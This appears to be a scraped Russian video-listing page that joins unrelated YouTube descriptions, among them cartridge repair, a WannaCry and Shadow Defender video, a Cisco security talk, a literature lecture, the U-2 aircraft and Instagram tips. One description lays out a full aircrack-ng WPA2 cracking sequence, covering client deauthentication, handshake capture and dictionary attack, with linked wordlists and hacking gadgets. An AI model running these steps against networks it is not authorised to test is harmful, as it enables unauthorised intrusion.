0.00
0 читателей, 4798 топиков

Восстановление картриджей DENDY - Замена капли - 8bitный стародел #015


#Восстановление #Замена #капли
основатель REPLYCONT — vk.com/replycont
Пишите комментарии, я буду очень рад!

флюс NC-559 — megabonus.com/y/TCPGw
лопатка — megabonus.com/y/6B5NI

VK — vk.com/itkrock
Instagram — www.instagram.com/10poison
Twitter — twitter.com/Poison__C
Facebook — www.facebook.com/10poison
ASK — ask.fm/krock10
YouTUBE — www.youtube.com/c/itConsoler
Магазин Retr0stuff — vk.com/retr0stuff
Магазин ОДЕЖДЫ — poisonc.myprintbar.ru
(магазин одежды от Consoleщика! возможно изготовление принтов под заказ, отправка ХОТЬ куда (стоимость доставки уточняйте в VK)

это молодой канал и требует много усилий для развития, если вам понравилось данное видео, буду рад вашим лайкам и подписке
на канал!
материальная поддержка канала так же приветствуется:
Донейт — www.donationalerts.ru/r/poisoncorpse
ЯMoney — money.yandex.ru/to/410012070304208
Webmoney USD — Z390909593537
Webmoney RUB — R271840957595

ДАЙ ПОИГЛАТЬ !!! ЗАЩИТА ОТ ЛИЧИНОК [WannaCry проиграл?]


Ссылка на кресло — bit.ly/2KJTM43
Наш Telegram канал — t.me/overlamer1
Второй канал — www.youtube.com/c/igorover
Паблик — overpublic1 — vk.com/over_view

Заказать рекламу вы можете здесь:
bit.ly/2nChGY8

Инстаграмчик здесь:
www.instagram.com/overbafer1

AliExpress в рамках закона [Bad AliExpress]:
vk.com/public137607137

Некультурный AliExpress:
vk.com/public146011210

В этом видео пойдет речь:
◘ Вирус WannaCry
◘ Тестируем вирус WannaCry
◘ Защита операционной системы Windows
◘ Откат операционной системы
◘ Восстановление удаленных данных
◘ Защита компьютера от детей

По любому у каждого владельца ПК бывали такие ситуации когда приходят гости и ваш компьютер становится жертвой нападения школьников. Многие владельцы компьютер не в большом восторге от того, что их машину кто-то будет лапать своими грязными руками. Тут дело не потому что «жалко», а потому что это часть человека. Эта система адаптирована под тебя, это кресло, эта мышка, эта клавиатура и т.д. — это всё твое убежище, и незваных гостей оно не приветствует.
Но, увы, не всегда мы в состоянии распоряжаться этим будучи подростками. Если к твоей маме придёт подружка со своим ребенком то они буду готовы на всё, лишь бы он им не мешал. И это «готовы на всё» будет являться нянечка в твоей лице. Это существо однозначно захочется притронуться к твоему оборудованию и как минимум заставить тебя играть во что-нибудь, либо будет терроризировать тебя пока ты ему не дашь поиграть. А если ты не дашь мамка тебя явно накажет поэтому хочешь ты или нет, но дать свой компьютер во владение мелкой личинки придётся.
И кто знает, что может произойти? Быть может ребенок перезапишет все твои сохранения, либо захочет просмотреть твои фотографии, накачает кучу вирусов, сделает браузер «Амиго» по умолчанию, а поисковиком станет mail.ru, или же захочет ради интереса снести тебе операционную систему, удалив папку Windows.
Я недавно нашел одно решение, которое сможет обезопасить систему от нападения мелких. Метод работает лишь с операционной системой, но не с самим компьютером (он по прежнему будет его трогать). Программа Shadow Defender — утилита для Microsoft Windows, которая позволяет защитить операционную систему, приложения и конфиденциальную информацию от изменений, а также сохранить их работоспособность.
Пусть хоть папку windows удаляет, или устанавливает любые браузеры, перезаписывает сохранения да хоть что! После перезагрузки все данные будут восстановлены в прежнем состоянии, достаточно указать жесткий диск, доступ к изменениям которому вы хотите ограничить, и выбрать нужный вам вариант:
1) Либо, чтобы изменения вступили в силу сразу же, и откат произошел после перезагрузки.
2) Либо, чтобы изменения вступили в силу после следующей загрузки компьютера.
Таким вот простым образом вы с лёгкостью можете обезопасить свои данные на всех жестких дисках. Правда компьютер (именно физически) всё еще будет под угрозой быть заляпанным соплями, хлебными крошками, шоколадом или пролитым соком.

Какие технологии кибербезопасности будут актуальны в среднесрочной перспективе


Прошло то время, когда вся система информационной безопасности на предприятии ограничивалась антивирусами на рабочих станциях и межсетевыми экранами на периметре. Сегодня, по оценкам экспертов, свыше 50% предприятий использует от 6 до 50 различных средств защиты. Как разобраться в том, что действительно важно, а что является обычным маркетинговым шлаком? Как понять, какие технологии нужно внедрять уже сейчас, а какие можно отложить до лучших времен? Обзору новых технологий (EDR,UEBA, NTA, NFT, CASB и др.) и посвящена данная презентация, в которой рассматриваются следующие вопросы:
— Как строилась система защиты еще совсем недавно?
— Почему прежняя парадигма системы защиты уже не работает?
— Как строить систему защиту с учетом текущих и среднесрочных тенденций?
— Что такое Use Case и какие они бывают?
— Какие технологии ИБ будут востребованы в ближайшее время и что они умеют делать (EDR, MDR, CASB, UEBA, NTA, NFT/EFT, TI, TVM, SIR, SIEM, Deception, Advanced Analytics, EPP, NGIPS, Browser Isolation, Microsegmentation, SDP, Container Security, Attack Simulation, SOAR и др.)?
Подписаться на канал Cisco: bit.ly/L1TDRt

Открытый урок с Дмитрием Быковым. "Евгений Онегин", как неоконченный роман


Программа «Открытый урок с Дмитрием Быковым» — смотрите только на RTVi.
«Евгений Онегин», как неоконченный роман.
Все лекции Дмитрия Быкова Вы можете найти на сайте rtvi.com и на нашем YouTube-канале.

Lockheed U-2 | Великий папарацци


Lockheed U-2 «Dragon Lady» — реактивный высотный разведывательный самолет, разработанный компанией Lockheed в 1950-хх.

Самолет был создан для выполнения наблюдательных полетов в любом регионе мира даже при условии активного противодействия ПВО. Основой его концепции является высотность полетов — более 70000 футов или 21 км, недостижимая для самолетов и артиллерии того времени. Самолет активно эксплуатировался силами ЦРУ и ВВС США до 1970-хх, а далее, ВВС США.

За весь приод экслпуатации U-2 принимал участие в, практически, всех военных операциях ВС США и спецвойск, а так же, проводил разведывательные миссии во всех регионах, включая СССР и КНР. В условиях гонки вооружений, силы ПВО, периодически, «догоняли» высотный разведчик и им удавалось его сбить. Наиболее известным таким случаем было сбитие U-2 с пилотом Фрэнсисом Гэри Пауэрсом в 1960 году. Однако, не смотря на все сложности и скандалы, U-2 продолжают службу до сих пор.

Приятного просмотра!

Подписывайтесь на канал, комментируйте, ставьте лайк!
Наша группа ВК: vk.com/club123681709
Инстаграм: www.instagram.com/karen_skyships

Вступайте в Air Public — одну из самых активных страниц, посвященных авиации Вконтакте: vk.com/air_public

{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind


✓ Наш канал в Телеграме: durov.cc/under_public

ali.pub/35zes7 — Недорогой хакерский смартфон поддерживающий Kali Linux
youtu.be/ZJ0StG_o9yI — Лучший генератор словарей для брута

● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.

● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i

● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]

● Набор словарей:
goo.gl/z7mnhf — Даты, использовать первым
goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
goo.gl/bVsfo2 — Элитный словарь от InsidePRO
goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов

— ● Помочь каналу и получить помощь в любых вопросах: donationalerts.com/r/undermind
● Стать спонсором канала: youtube.com/TheUnderMind/join
● Я ВКонтакте: vk.com/TheUnderMind
● Реклама на канале: bit.ly/2THIswk

— ✓ Наш сайт: darksploit.su
✓ Наш второй канал: vk.cc/9Nuba7
✓ Паблик в ВК: vk.cc/aby9hC
✓ Чат в ВК: vk.cc/abxUPr
✓ Паблик в Телеграме: durov.cc/under_public
✓ Чат в Телеграме: durov.cc/UnderChats

— ● Лучшие товары для xaЦkера:

✓ Мой хаЦкepcкий смартфон для Kali Linux (Nethunter и поддержкой правильного ядра) — ali.pub/35zes7

✓ Alfa — Лучший WiFi Адаптер (работает в Kali Linux и Nethunter): goo.gl/sv7Vuf

✓ ХаЦкерские часы-деаутентификатор с WiFi: ali.pub/4hhw62

✓ НасkRF Оnе — лучший SDR: ali.pub/4hhwsm

✓ Маленькая Bluetooth-клавиатура с подсветкой: ali.pub/4hhwwp

✓ USB порт для вашего смартфона (OTG Micro USB): goo.gl/H7pLVT

✓ WiFi Jаmmеr на ESP8266 (Глушилка-Деавторизатор WiFi): goo.gl/i7VHWP

✓ Злo Кaбель (BadUSB): ali.pub/4hhyo3

✓ Raspberry PI 3 B (можно сделать xaцk-станцию): ali.pub/4hhwzt

✓ Ruby Ducky BadUSB (XaЦkepcкий девайс в виде флешки): ali.pub/4hhxn5

✓ USB to Ethernet адаптер: ali.pub/4hhxux

✓ Разветвитель USB порта 1 в 4: goo.gl/pBoQPW

✓ Дубликатор RFID ключей и карт: goo.gl/snvemZ

✓ Дубликатор RFID / NFC, редактор кодов: ali.pub/4hhy1q

✓ Недорогие, но очень мощные рации: goo.gl/dKibg5

✓ Недорогой, но мощный WiFi адаптер: goo.gl/c5eWga

✓ Микро камера: ali.pub/4hhy49

✓ Клавиатуры с подсветкой для ПК: ali.pub/4hhyav

✓ Коврик для мыши с подсветкой: ali.pub/4hhycm

— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.

● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…

● Дополнительные хештеги:
#взлом #wifi #вайфай #хак #hack #vk #взломать #kali #linux #under #андер #undermind

как поднять охваты stories в Instagram? | советы


Подписывайтесь на меня в Instagram: www.instagram.com/macifiqa/

Мой канал в Telegram: t.me/macifiqa
Группа VK: vk.com/malikovamadina

FAQ:

Как меня зовут?
— МАДИНА МАЛИКОВА
Сколько мне лет?
— 21 ГОД
Откуда я?
— Я С КАЗАХСТАНА, ГОРОД АЛМАТЫ
Кто я по национальности?
— КАЗАШКА
Где я учусь?
— ZHEJIANG UNIVERSITY INTERNATIONAL CAMPUS В ГОРОДЕ ХАЙНИНЬ, КИТАЙ
На что я снимаю статичные видое?
— CANON 700D
На что я снимаю влоги?
— DJI Osmo Pocket
В какой программе я монтирую?
— FINAL CUT PRO X

СОТРУДНИЧЕСТВО: macifiqa@gmail.com